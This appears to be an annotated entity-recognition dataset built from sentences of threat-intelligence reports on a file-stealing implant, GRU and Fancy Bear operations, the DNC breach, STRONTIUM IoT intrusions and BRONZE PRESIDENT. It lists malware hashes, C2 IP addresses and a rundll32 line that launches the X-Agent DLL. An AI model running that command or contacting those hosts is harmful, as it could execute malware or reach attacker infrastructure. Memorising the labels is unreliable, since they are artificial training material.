{"text": "The module inspects every new disk volume attached to the system .", "spans": []}
{"text": "For every disk it creates a \u201c stash \u201d directory in \u201c %root stash directory location%\\%volume serial number in hex% \u201d with attributes FILE_ATTRIBUTE_HIDDEN and FILE_ATTRIBUTE_SYSTEM .", "spans": []}
{"text": "The root stash directory location may be read from the configuration file or set to the default location which is \u201c %MYPICTURES% \u201d .", "spans": []}
{"text": "Then , it traverses the filesystem of the volume looking for files .", "spans": []}
{"text": "Depending on the settings read from the configuration file , the scope may be narrowed to files with particular extensions and/or files created after a specified date .", "spans": []}
{"text": "It is worth noting that if the source file location contains the string \u201c System Volume Information\\S-1-5-21-1315235578-283289242\\ \u201d , then the file is deleted after copying to the \u201c stash \u201d directory .", "spans": []}
{"text": "There are known related samples that are able to create such directories on removable drives , i.e . the sample with md5: 8cb08140ddb00ac373d29d37657a03cc .", "spans": [{"start": 122, "end": 154, "label": "Indicator"}]}
{"text": "The configuration file is loaded from the same directory as the module and is expected to have a name \u201c NvCpld.dat \u201c .", "spans": [{"start": 104, "end": 114, "label": "Indicator"}]}
{"text": "It is a text file that may contain the following configuration parameters :", "spans": []}
{"text": "Path \u2013 location of the root \u201c stash \u201d directory Ext \u2013 search for files with one of these extensions only Date \u2013 search for files not earlier than this date Internal name : NvCpld.dll ( from export table ) , msdetltemp.dll ( from resources ) , IGFSRVC.dll ( from resources ) File format : PE32 DLL File size : 76,288 bytes MD5s : 8b238931a7f64fddcad3057a96855f6c , ce151285e8f0e7b2b90162ba171a4b90 Linker version : 11.0 , Microsoft Visual Studio Linker timestamps : 2015.05.29 11:20:32 ( GMT ) , 2006.11.25 04:39:15 ( GMT ) Exported functions :", "spans": [{"start": 172, "end": 182, "label": "Indicator"}, {"start": 207, "end": 221, "label": "Indicator"}, {"start": 243, "end": 254, "label": "Indicator"}, {"start": 293, "end": 296, "label": "System"}, {"start": 329, "end": 361, "label": "Indicator"}, {"start": 364, "end": 396, "label": "Indicator"}, {"start": 421, "end": 430, "label": "Organization"}, {"start": 431, "end": 444, "label": "System"}, {"start": 487, "end": 490, "label": "System"}, {"start": 517, "end": 520, "label": "System"}]}
{"text": "10002500: NvMswt 10002860: NvReg 10002880: NvStart 10002A80: NvStop This library is a newer version of the file collection module ( md5: 0369620eb139c3875a62e36bb7abdae8 ) wrapped in a DLL file .", "spans": [{"start": 137, "end": 169, "label": "Indicator"}, {"start": 185, "end": 188, "label": "System"}]}
{"text": "There are two known variants of this module ; they only differ in timestamp values and version information in the resource section .", "spans": []}
{"text": "The DllMain function only decrypts the data structures and initializes Windows API pointers .", "spans": [{"start": 71, "end": 78, "label": "System"}]}
{"text": "The function \u201c NvMswt \u201d is a wrapper for the API function MsgWaitForMultipleObjects .", "spans": []}
{"text": "The function \u201c NvReg \u201d is a wrapper for the API function RegisterClassW .", "spans": []}
{"text": "The function \u201c NvStart \u201d is similar to the main function of the older module ; it creates a window and enters the message loop waiting for device arrival notifications .", "spans": []}
{"text": "The only difference introduced is that an event named \u201c WerTyQ34C \u201d can be signalled by the function \u201c NvStop \u201d to terminate the message loop and stop processing .", "spans": []}
{"text": "How they did it : GRU hackers .", "spans": []}
{"text": "US elections .", "spans": []}
{"text": "In a press briefing just two weeks ago , Deputy Attorney General Rod Rosenstein announced that the grand jury assembled by Special Counsel Robert Mueller had returned an indictment against 12 officers of Russia 's Main Intelligence Directorate of the Russian General Staff ( better known as Glavnoye razvedyvatel'noye upravleniye , or GRU ) .", "spans": [{"start": 291, "end": 329, "label": "Organization"}, {"start": 335, "end": 338, "label": "Organization"}]}
{"text": "The indictment was for conducting \" active cyber operations with the intent of interfering in the 2016 presidential election . \" The espionage operation was run by Unit 26165 , commanded by GRU Officer Viktor Borisovich Netykshko .", "spans": [{"start": 164, "end": 174, "label": "Organization"}, {"start": 190, "end": 193, "label": "Organization"}]}
{"text": "Unit 26165 appears to be the organization behind at least part of the \"threat group\" of tools , techniques , and procedures known as \" Fancy Bear , \" \" Sofacy , \" \" APT28 , \" and \" Sednit \" .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 135, "end": 145, "label": "Organization"}, {"start": 152, "end": 158, "label": "Organization"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 181, "end": 187, "label": "Organization"}]}
{"text": "Within the unit , two divisions were involved in the breaches : one specializing in operations and the second in development and maintenance of hacking tools and infrastructure .", "spans": []}
{"text": "The operations division , supervised by Major Boris Alekseyevich Antonov , specialized in targeting organizations of intelligence interest through spear-phishing campaigns and the exploitation of stolen credentials .", "spans": []}
{"text": "Antonov's group included Ivan Sergeyevich Yermakov and Senior Lieutenant Aleksey Viktorovich Lukashev , according to the indictment , and they were responsible for targeting the email accounts that were exposed on the \" DCLeaks \" site prior to the election operations .", "spans": [{"start": 178, "end": 183, "label": "System"}, {"start": 220, "end": 227, "label": "Organization"}]}
{"text": "The second division , overseen by Lieutenant Colonel Sergey Aleksandrovich Morgachev , managed the development and maintenance of malware and hacking tools used by Unit 26165 , including the X-Agent \" implant \" .", "spans": [{"start": 164, "end": 174, "label": "Organization"}, {"start": 191, "end": 198, "label": "Malware"}]}
{"text": "X-Agent is a signature tool of Fancy Bear operations\u2014a cross-platform backdoor toolset with variants for Windows , MacOS , Android , and iOS .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 31, "end": 41, "label": "Organization"}, {"start": 105, "end": 112, "label": "System"}, {"start": 115, "end": 120, "label": "System"}, {"start": 123, "end": 130, "label": "System"}, {"start": 137, "end": 140, "label": "System"}]}
{"text": "The Windows and MacOS versions of X-Agent are capable of recording keystrokes , taking screenshots , and exfiltrating files from infected systems back to a command and control server .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 16, "end": 21, "label": "System"}, {"start": 34, "end": 41, "label": "Malware"}]}
{"text": "Lieutenant Captain Nikolay Kozacheck ( who used the hacker monikers \" kazak \" and \" blablabla1234465 \" ) was the primary developer and maintainer of X-Agent , according to the indictment , and he was assisted by another officer , Pavel Yershov , in preparing it for deployment .", "spans": [{"start": 149, "end": 156, "label": "Malware"}]}
{"text": "Once X-Agent was implanted on the DNC and DCCC networks , Second Lieutenant Artem Malyshev ( AKA \" djangomagicdev \" and \" realblatr \" ) monitored the implants through the command and control network configured for the task .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 34, "end": 37, "label": "System"}, {"start": 42, "end": 46, "label": "System"}]}
{"text": "The information operations unit , Unit 74455 , was commanded by Colonel Aleksandr Vladimirovich Osadchuk .", "spans": [{"start": 34, "end": 44, "label": "Organization"}]}
{"text": "Unit 74455 's members would be responsible for the distribution of some of the stolen data from the breaches through the \" DCLeaks \" and \" Guccifer 2.0 \" websites .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 123, "end": 130, "label": "Organization"}, {"start": 139, "end": 147, "label": "Organization"}]}
{"text": "This group famously also reached out to WikiLeaks ( referred to as \" Organization 1 \" in the indictment ) to amplify their information operation , and they promoted the leaks to journalists through GRU -controlled email and social media accounts .", "spans": [{"start": 40, "end": 49, "label": "System"}, {"start": 198, "end": 201, "label": "Organization"}, {"start": 214, "end": 219, "label": "System"}]}
{"text": "Within Unit 74455 , Officer Aleksy Potemkin\u2014a department supervisor\u2014oversaw information operations infrastructure .", "spans": [{"start": 7, "end": 17, "label": "Organization"}]}
{"text": "His group configured the DCLeaks and Guccifer 2.0 blogs and social media accounts that would later be used to spread data stolen from the DNC , DCCC , and Clinton campaigns .", "spans": [{"start": 25, "end": 32, "label": "Organization"}, {"start": 37, "end": 45, "label": "Organization"}, {"start": 138, "end": 141, "label": "System"}, {"start": 144, "end": 148, "label": "System"}]}
{"text": "Bears in the Midst : Intrusion Into the Democratic National Committee .", "spans": [{"start": 40, "end": 69, "label": "Organization"}]}
{"text": "There is rarely a dull day at CrowdStrike where we are not detecting or responding to a breach at a company somewhere around the globe .", "spans": [{"start": 30, "end": 41, "label": "Organization"}]}
{"text": "In all of these cases , we operate under strict confidentiality rules with our customers and cannot reveal publicly any information about these attacks .", "spans": []}
{"text": "But on rare occasions , a customer decides to go public with information about their incident and give us permission to share our knowledge of the adversary tradecraft with the broader community and help protect even those who do not happen to be our customers .", "spans": []}
{"text": "This story is about one of those cases .", "spans": []}
{"text": "CrowdStrike Services Inc. , our Incident Response group , was called by the Democratic National Committee ( DNC ) , the formal governing body for the US Democratic Party , to respond to a suspected breach .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 32, "end": 49, "label": "Organization"}, {"start": 76, "end": 105, "label": "Organization"}, {"start": 108, "end": 111, "label": "Organization"}]}
{"text": "We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network \u2013 COZY BEAR and FANCY BEAR .", "spans": [{"start": 16, "end": 18, "label": "Organization"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}]}
{"text": "We \u2019ve had lots of experience with both of these actors attempting to target our customers in the past and know them well .", "spans": []}
{"text": "In fact , our team considers them some of the best threat actors out of all the numerous nation-state , criminal and hacktivist/terrorist groups we encounter on a daily basis .", "spans": []}
{"text": "Their tradecraft is superb , operational security second to none and the extensive usage of \u2018 living-off-the-land \u2019 techniques enables them to easily bypass many security solutions they encounter .", "spans": []}
{"text": "In particular , we identified advanced methods consistent with nation-state level capabilities including deliberate targeting and \u2018 access management \u2019 tradecraft \u2013 both groups were constantly going back into the environment to change out their implants , modify persistent methods , move to new Command & Control channels and perform other tasks to try to stay ahead of being detected .", "spans": [{"start": 296, "end": 313, "label": "System"}]}
{"text": "Both adversaries engage in extensive political and economic espionage for the benefit of the government of the Russian Federation and are believed to be closely linked to the Russian government \u2019s powerful and highly capable intelligence services .", "spans": []}
{"text": "COZY BEAR ( also referred to in some industry reports as CozyDuke or APT 29 ) is the adversary group that last year successfully infiltrated the unclassified networks of the White House , State Department , and US Joint Chiefs of Staff .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 57, "end": 65, "label": "Organization"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 174, "end": 185, "label": "Organization"}, {"start": 188, "end": 204, "label": "Organization"}, {"start": 214, "end": 235, "label": "Organization"}]}
{"text": "In addition to the US government , they have targeted organizations across the Defense , Energy , Extractive , Financial , Insurance , Legal , Manufacturing Media , Think Tanks , Pharmaceutical , Research and Technology industries , along with Universities .", "spans": []}
{"text": "Victims have also been observed in Western Europe , Brazil , China , Japan , Mexico , New Zealand , South Korea , Turkey and Central Asian countries .", "spans": []}
{"text": "COZY BEAR \u2019s preferred intrusion method is a broadly targeted spearphish campaign that typically includes web links to a malicious dropper .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]}
{"text": "Once executed on the machine , the code will deliver one of a number of sophisticated Remote Access Tools ( RATs ) , including AdobeARM , ATI-Agent , and MiniDionis .", "spans": [{"start": 86, "end": 105, "label": "System"}, {"start": 108, "end": 112, "label": "System"}, {"start": 127, "end": 135, "label": "System"}, {"start": 138, "end": 147, "label": "System"}, {"start": 154, "end": 164, "label": "System"}]}
{"text": "On many occasions , both the dropper and the payload will contain a range of techniques to ensure the sample is not being analyzed on a virtual machine , using a debugger , or located within a sandbox .", "spans": []}
{"text": "They have extensive checks for the various security software that is installed on the system and their specific configurations .", "spans": []}
{"text": "When specific versions are discovered that may cause issues for the RAT , it promptly exits .", "spans": [{"start": 68, "end": 71, "label": "System"}]}
{"text": "These actions demonstrate a well-resourced adversary with a thorough implant-testing regime that is highly attuned to slight configuration issues that may result in their detection , and which would cause them to deploy a different tool instead .", "spans": []}
{"text": "The implants are highly configurable via encrypted configuration files , which allow the adversary to customize various components , including C2 servers , the list of initial tasks to carry out , persistence mechanisms , encryption keys and others .", "spans": [{"start": 143, "end": 145, "label": "System"}]}
{"text": "An HTTP protocol with encrypted payload is used for the Command & Control communication .", "spans": [{"start": 3, "end": 7, "label": "Indicator"}, {"start": 56, "end": 73, "label": "System"}]}
{"text": "FANCY BEAR ( also known as Sofacy or APT 28 ) is a separate Russian-based threat actor , which has been active since mid 2000s , and has been responsible for targeted intrusion campaigns against the Aerospace , Defense , Energy , Government and Media sectors .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 27, "end": 33, "label": "Organization"}, {"start": 37, "end": 43, "label": "Organization"}]}
{"text": "Their victims have been identified in the United States , Western Europe , Brazil , Canada , China , Georgia , Iran , Japan , Malaysia and South Korea .", "spans": []}
{"text": "Extensive targeting of defense ministries and other military victims has been observed , the profile of which closely mirrors the strategic interests of the Russian government , and may indicate affiliation with GRU , Russia \u2019s premier military intelligence service .", "spans": [{"start": 212, "end": 215, "label": "Organization"}]}
{"text": "This adversary has a wide range of implants at their disposal , which have been developed over the course of many years and include Sofacy , X-Agent , X-Tunnel , WinIDS , Foozer and DownRage droppers , and even malware for Linux , OSX , IOS , Android and Windows Phones .", "spans": [{"start": 132, "end": 138, "label": "Organization"}, {"start": 141, "end": 148, "label": "Malware"}, {"start": 151, "end": 159, "label": "System"}, {"start": 162, "end": 168, "label": "Malware"}, {"start": 171, "end": 177, "label": "Malware"}, {"start": 182, "end": 190, "label": "Malware"}, {"start": 223, "end": 228, "label": "System"}, {"start": 231, "end": 234, "label": "System"}, {"start": 237, "end": 240, "label": "System"}, {"start": 243, "end": 250, "label": "System"}, {"start": 255, "end": 262, "label": "System"}]}
{"text": "This group is known for its technique of registering domains that closely resemble domains of legitimate organizations they plan to target .", "spans": []}
{"text": "Afterwards , they establish phishing sites on these domains that spoof the look and feel of the victim \u2019s web-based email services in order to steal their credentials .", "spans": [{"start": 116, "end": 121, "label": "System"}]}
{"text": "FANCY BEAR has also been linked publicly to intrusions into the German Bundestag and France \u2019s TV5 Monde TV station in April 2015 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 71, "end": 80, "label": "Organization"}, {"start": 95, "end": 104, "label": "Organization"}]}
{"text": "At DNC , COZY BEAR intrusion has been identified going back to summer of 2015 , while FANCY BEAR separately breached the network in April 2016 .", "spans": [{"start": 3, "end": 6, "label": "Organization"}, {"start": 9, "end": 18, "label": "Organization"}, {"start": 86, "end": 96, "label": "Organization"}]}
{"text": "We have identified no collaboration between the two actors , or even an awareness of one by the other .", "spans": []}
{"text": "Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials .", "spans": []}
{"text": "While you would virtually never see Western intelligence agencies going after the same target without de-confliction for fear of compromising each other \u2019s operations , in Russia this is not an uncommon scenario . \u201c Putin \u2019s Hydra : Inside Russia \u2019s Intelligence Services \u201d , a recent paper from European Council on Foreign Relations , does an excellent job outlining the highly adversarial relationship between Russia \u2019s main intelligence services \u2013 FSB , the primary domestic intelligence agency but one with also significant external collection and \u2018 active measures \u2019", "spans": [{"start": 451, "end": 454, "label": "Organization"}]}
{"text": "remit , SVR , the primary foreign intelligence agency , and the aforementioned GRU .", "spans": [{"start": 79, "end": 82, "label": "Organization"}]}
{"text": "Not only do they have overlapping areas of responsibility , but also rarely share intelligence and even occasionally steal sources from each other and compromise operations .", "spans": []}
{"text": "Thus , it is not surprising to see them engage in intrusions against the same victim , even when it may be a waste of resources and lead to the discovery and potential compromise of mutual operations .", "spans": []}
{"text": "The COZY BEAR intrusion relied primarily on the SeaDaddy implant developed in Python and compiled with py2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation ( WMI ) system , which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on a specific schedule .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 48, "end": 56, "label": "Malware"}, {"start": 78, "end": 84, "label": "System"}, {"start": 103, "end": 109, "label": "System"}, {"start": 122, "end": 132, "label": "System"}, {"start": 176, "end": 183, "label": "System"}, {"start": 184, "end": 210, "label": "System"}, {"start": 213, "end": 216, "label": "System"}]}
{"text": "The Powershell backdoor is ingenious in its simplicity and power .", "spans": [{"start": 4, "end": 14, "label": "System"}]}
{"text": "This one-line powershell command , stored only in WMI database , establishes an encrypted connection to C2 and downloads additional powershell modules from it , executing them in memory .", "spans": [{"start": 14, "end": 24, "label": "System"}, {"start": 50, "end": 53, "label": "System"}, {"start": 104, "end": 106, "label": "System"}, {"start": 132, "end": 142, "label": "System"}]}
{"text": "In theory , the additional modules can do virtually anything on the victim system .", "spans": []}
{"text": "The encryption keys in the script were different on every system .", "spans": []}
{"text": "Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 44, "end": 52, "label": "Malware"}]}
{"text": "FANCY BEAR adversary used different tradecraft , deploying X-Agent malware with capabilities to do remote command execution , file transmission and keylogging .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 59, "end": 66, "label": "Malware"}]}
{"text": "It was executed via rundll32 commands such as : rundll32.exe \u201c C:\\Windows\\twain_64.dll \u201d .", "spans": [{"start": 48, "end": 60, "label": "Indicator"}, {"start": 63, "end": 86, "label": "Indicator"}]}
{"text": "In addition , FANCY BEAR \u2019s X-Tunnel network tunneling tool , which facilitates connections to NAT-ed environments , was used to also execute remote commands .", "spans": [{"start": 14, "end": 24, "label": "Organization"}, {"start": 28, "end": 36, "label": "System"}, {"start": 95, "end": 101, "label": "System"}]}
{"text": "Both tools were deployed via RemCOM , an open-source replacement for PsExec available from GitHub .", "spans": [{"start": 29, "end": 35, "label": "Organization"}, {"start": 69, "end": 75, "label": "System"}, {"start": 91, "end": 97, "label": "System"}]}
{"text": "Intelligence collection directed by nation state actors against US political targets provides invaluable insight into the requirements directed upon those actors .", "spans": []}
{"text": "Regardless of the agency or unit tasked with this collection , the upcoming US election , and the associated candidates and parties are of critical interest to both hostile and friendly nation states .", "spans": []}
{"text": "The 2016 presidential election has the world \u2019s attention , and leaders of other states are anxiously watching and planning for possible outcomes .", "spans": []}
{"text": "Corporate IoT \u2013 a path to intrusion .", "spans": [{"start": 10, "end": 13, "label": "System"}]}
{"text": "Several sources estimate that by the year 2020 some 50 billion IoT devices will be deployed worldwide .", "spans": [{"start": 63, "end": 66, "label": "System"}]}
{"text": "IoT devices are purposefully designed to connect to a network and many are simply connected to the internet with little management or oversight.Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates .", "spans": [{"start": 0, "end": 3, "label": "System"}, {"start": 149, "end": 152, "label": "System"}]}
{"text": "In 2016 , the Mirai botnet was discovered by the malware research group MalwareMustDie .", "spans": [{"start": 14, "end": 26, "label": "System"}, {"start": 72, "end": 86, "label": "Organization"}]}
{"text": "The botnet initially consisted of IP cameras and basic home routers , two types of IoT devices commonly found in the household .", "spans": [{"start": 83, "end": 86, "label": "System"}]}
{"text": "As more variants of Mirai emerged , so did the list IoT devices it was targeting .", "spans": [{"start": 20, "end": 25, "label": "System"}, {"start": 52, "end": 55, "label": "System"}]}
{"text": "The source code for the malware powering this botnet was eventually leaked online .", "spans": []}
{"text": "In 2018 , hundreds of thousands of home and small business networking and storage devices were compromised and loaded with the so-called \u201c VPN Filter \u201d malware .", "spans": [{"start": 139, "end": 149, "label": "Malware"}]}
{"text": "The FBI has publicly attributed this activity to a nation-state actor and took subsequent actions to disrupt this botnet , although the devices would remain vulnerable to re-infection unless proper firmware or security controls were put in place by the user .", "spans": [{"start": 4, "end": 7, "label": "Organization"}]}
{"text": "In April , security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known adversary communicating to several external devices .", "spans": [{"start": 39, "end": 48, "label": "Organization"}, {"start": 49, "end": 75, "label": "System"}]}
{"text": "Further research uncovered attempts by the actor to compromise popular IoT devices ( a VOIP phone , an office printer , and a video decoder ) across multiple customer locations .", "spans": [{"start": 71, "end": 74, "label": "System"}, {"start": 87, "end": 97, "label": "System"}, {"start": 103, "end": 117, "label": "System"}, {"start": 126, "end": 139, "label": "System"}]}
{"text": "The investigation uncovered that an actor had used these devices to gain initial access to corporate networks .", "spans": []}
{"text": "In two of the cases , the passwords for the devices were deployed without changing the default manufacturer \u2019s passwords and in the third instance the latest security update had not been applied to the device .", "spans": []}
{"text": "These devices became points of ingress from which the actor established a presence on the network and continued looking for further access .", "spans": []}
{"text": "Once the actor had successfully established access to the network , a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data .", "spans": []}
{"text": "After gaining access to each of the IoT devices , the actor ran tcpdump to sniff network traffic on local subnets .", "spans": [{"start": 36, "end": 39, "label": "System"}]}
{"text": "They were also seen enumerating administrative groups to attempt further exploitation .", "spans": []}
{"text": "As the actor moved from one device to another , they would drop a simple shell script to establish persistence on the network which allowed extended access to continue hunting .", "spans": []}
{"text": "Analysis of network traffic showed the devices were also communicating with an external command and control ( C2 ) server .", "spans": [{"start": 88, "end": 107, "label": "System"}, {"start": 110, "end": 112, "label": "System"}]}
{"text": "The following IP addresses are believed to have been used by the actor for command and control ( C2 ) during these intrusions :", "spans": [{"start": 75, "end": 94, "label": "System"}, {"start": 97, "end": 99, "label": "System"}]}
{"text": "167.114.153.55 94.237.37.28 82.118.242.171 31.220.61.251 128.199.199.187 .", "spans": [{"start": 0, "end": 14, "label": "Indicator"}, {"start": 15, "end": 27, "label": "Indicator"}, {"start": 28, "end": 42, "label": "Indicator"}, {"start": 43, "end": 56, "label": "Indicator"}, {"start": 57, "end": 72, "label": "Indicator"}]}
{"text": "We attribute the attacks on these customers using three popular IoT devices to an activity group that Microsoft refers to as STRONTIUM .", "spans": [{"start": 64, "end": 67, "label": "System"}, {"start": 102, "end": 111, "label": "Organization"}, {"start": 125, "end": 134, "label": "Organization"}]}
{"text": "Since we identified these attacks in the early stages , we have not been able to conclusively determine what STRONTIUM \u2019s ultimate objectives were in these intrusions .", "spans": [{"start": 109, "end": 118, "label": "Organization"}]}
{"text": "Over the last twelve months , Microsoft has delivered nearly 1400 nation-state notifications to those who have been targeted or compromised by STRONTIUM .", "spans": [{"start": 30, "end": 39, "label": "Organization"}, {"start": 143, "end": 152, "label": "Organization"}]}
{"text": "One in five notifications of STRONTIUM activity were tied to attacks against non-governmental organizations , think tanks , or politically affiliated organizations around the world .", "spans": [{"start": 29, "end": 38, "label": "Organization"}]}
{"text": "The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors : government , IT , military , defense , medicine , education , and engineering .", "spans": [{"start": 21, "end": 30, "label": "Organization"}]}
{"text": "We have also observed and notified STRONTIUM attacks against Olympic organizing committees , anti-doping agencies , and the hospitality industry .", "spans": [{"start": 35, "end": 44, "label": "Organization"}, {"start": 61, "end": 68, "label": "Organization"}]}
{"text": "The \u201c VPN Filter \u201d malware has also been attributed to STRONTIUM by the FBI .", "spans": [{"start": 6, "end": 16, "label": "Malware"}, {"start": 55, "end": 64, "label": "Organization"}, {"start": 72, "end": 75, "label": "Organization"}]}
{"text": "Below are a series of indicators Microsoft has observed as active during the STRONTIUM activity discussed in this article .", "spans": [{"start": 77, "end": 86, "label": "Organization"}]}
{"text": "BRONZE PRESIDENT Targets NGOs .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 25, "end": 29, "label": "Organization"}]}
{"text": "The activities of some non-governmental organizations ( NGOs ) challenge governments on politically sensitive issues such as social , humanitarian , and environmental policies .", "spans": [{"start": 23, "end": 53, "label": "Organization"}, {"start": 56, "end": 60, "label": "Organization"}]}
{"text": "As a result , these organizations are often exposed to increased government-directed threats aimed at monitoring their activities , discrediting their work , or stealing their intellectual property .", "spans": []}
{"text": "BRONZE PRESIDENT is a likely People's Republic of China ( PRC )-based targeted cyberespionage group that uses both proprietary and publicly available tools to target NGO networks .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 29, "end": 55, "label": "Organization"}, {"start": 58, "end": 61, "label": "Organization"}, {"start": 166, "end": 169, "label": "Organization"}]}
{"text": "Secureworks Counter Threat Unit ( CTU ) researchers have observed BRONZE PRESIDENT activity since mid-2018 but identified artifacts suggesting that the threat actors may have been conducting network intrusions as far back as 2014 .", "spans": [{"start": 0, "end": 31, "label": "Organization"}, {"start": 34, "end": 37, "label": "Organization"}, {"start": 66, "end": 82, "label": "Organization"}]}
{"text": "The BRONZE PRESIDENT cyberespionage group targets NGOs , as well as political and law enforcement organizations in countries in South and East Asia .", "spans": [{"start": 4, "end": 20, "label": "Organization"}]}
{"text": "The threat group appears to have developed its own remote access tools that it uses alongside publicly available remote access and post-compromise toolsets .", "spans": []}
{"text": "After compromising a network , the threat actors elevate their privileges and install malware on a large proportion of systems .", "spans": []}
{"text": "The group runs custom batch scripts to collect specific file types and takes proactive steps to minimize detection of its activities .", "spans": []}
{"text": "Analysis of a threat group's targeting , origin , and competencies can determine which organizations could be at risk .", "spans": []}
{"text": "This information can help organizations make strategic defensive decisions in relation to the BRONZE PRESIDENT threat group .", "spans": [{"start": 94, "end": 110, "label": "Organization"}]}
{"text": "CTU researchers have observed BRONZE PRESIDENT targeting multiple NGOs .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 46, "label": "Organization"}, {"start": 66, "end": 70, "label": "Organization"}]}
{"text": "The threat actors steal data from compromised systems over a long period of time , which likely indicates a long-term objective of monitoring the target's network .", "spans": []}
{"text": "BRONZE PRESIDENT uses custom batch scripts to collect either specific file types ( including files with .pptx , .xlsx , .pdf extensions ) or all files within a specific location .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 104, "end": 109, "label": "Indicator"}, {"start": 112, "end": 117, "label": "Indicator"}, {"start": 120, "end": 124, "label": "Indicator"}]}
{"text": "CTU researchers also observed evidence that the threat actors collect credentials from high-privilege network accounts and reputationally sensitive accounts , such as social media and webmail accounts .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]}
{"text": "Additionally , CTU researchers have observed evidence of BRONZE PRESIDENT targeting political and law enforcement organizations in countries adjacent to the PRC , including Mongolia and India .", "spans": [{"start": 15, "end": 18, "label": "Organization"}, {"start": 57, "end": 73, "label": "Organization"}, {"start": 157, "end": 160, "label": "Organization"}]}
{"text": "Some of the group's phishing lures suggest an interest in national security , humanitarian , and law enforcement organizations in the East , South , and Southeast Asia ( see Figure 1 ) .", "spans": []}
{"text": "These examples reveal BRONZE PRESIDENT 's likely intent to conduct political espionage in other countries in addition to targeting NGOs .", "spans": [{"start": 22, "end": 38, "label": "Organization"}, {"start": 131, "end": 135, "label": "Organization"}]}
{"text": "It is highly likely that BRONZE PRESIDENT is based in the PRC due to the following observations :", "spans": [{"start": 25, "end": 41, "label": "Organization"}, {"start": 58, "end": 61, "label": "Organization"}]}
{"text": "The NGOs targeted by BRONZE PRESIDENT conduct research on issues relevant to the PRC .", "spans": [{"start": 4, "end": 8, "label": "Organization"}, {"start": 21, "end": 37, "label": "Organization"}, {"start": 81, "end": 84, "label": "Organization"}]}
{"text": "Strong evidence links BRONZE PRESIDENT 's infrastructure to entities within the PRC .", "spans": [{"start": 22, "end": 38, "label": "Organization"}, {"start": 80, "end": 83, "label": "Organization"}]}
{"text": "There are connections between a subset of the group's operational infrastructure and PRC-based Internet service providers .", "spans": [{"start": 85, "end": 94, "label": "Organization"}]}
{"text": "Tools such as PlugX have historically been leveraged by threat groups operating in the PRC .", "spans": [{"start": 14, "end": 19, "label": "Malware"}, {"start": 87, "end": 90, "label": "Organization"}]}
{"text": "It is likely that BRONZE PRESIDENT is sponsored or at least tolerated by the PRC government .", "spans": [{"start": 18, "end": 34, "label": "Organization"}, {"start": 77, "end": 80, "label": "Organization"}]}
{"text": "The threat group's systemic long-term targeting of NGO and political networks does not align with patriotic or criminal threat groups .", "spans": [{"start": 51, "end": 54, "label": "Organization"}]}
{"text": "BRONZE PRESIDENT has deployed a variety of remote access tools .", "spans": [{"start": 0, "end": 16, "label": "Organization"}]}
{"text": "The use of tools not previously observed by CTU researchers suggests that the group could have access to malware development capabilities .", "spans": [{"start": 44, "end": 47, "label": "Organization"}]}
{"text": "BRONZE PRESIDENT also uses widely available or modified open-source tools , which could be a strategic effort to reduce the risk of attribution or to minimize the need for tool development resources .", "spans": [{"start": 0, "end": 16, "label": "Organization"}]}
{"text": "Following a network compromise , the threat actors typically delete their tools and processes .", "spans": []}
{"text": "However , the group is content leaving some malware on the network , likely to provide a contingency if other access channels are removed .", "spans": []}
{"text": "When the group's activities were detected in one incident , it had elevated privileges and had maintained access to the targeted environment for several months .", "spans": []}
{"text": "This finding indicates the group's effectiveness at maintaining long-term access to a targeted network .", "spans": []}
{"text": "CTU researchers and Secureworks incident responders have observed BRONZE PRESIDENT using the following tools , along with several custom batch scripts for locating and archiving specific file types :", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 66, "end": 82, "label": "Organization"}]}
{"text": "Cobalt Strike \u2014 This popular and commercially available penetration tool gains shell access to an infected system .", "spans": [{"start": 0, "end": 13, "label": "System"}]}
{"text": "It allows threat actors to execute additional tools and perform post-intrusion actions on compromised systems .", "spans": []}
{"text": "Cobalt Strike appears to be one of BRONZE PRESIDENT 's preferred remote access tools .", "spans": [{"start": 0, "end": 13, "label": "System"}, {"start": 35, "end": 51, "label": "Organization"}]}
{"text": "During one intrusion , the threat actors installed it on over 70% of accessible hosts .", "spans": []}
{"text": "The group's Cobalt Strike installation typically uses a payload named svchost.exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost.exe executable .", "spans": [{"start": 12, "end": 25, "label": "System"}, {"start": 70, "end": 81, "label": "Indicator"}, {"start": 108, "end": 121, "label": "System"}, {"start": 149, "end": 156, "label": "System"}, {"start": 157, "end": 168, "label": "Indicator"}]}
{"text": "PlugX \u2014 This remote access Trojan ( RAT ) is popular among PRC-based targeted threat groups .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 27, "end": 33, "label": "Malware"}, {"start": 59, "end": 68, "label": "Organization"}]}
{"text": "Its functionality includes uploading and downloading files , and it has configurable network protocols .", "spans": []}
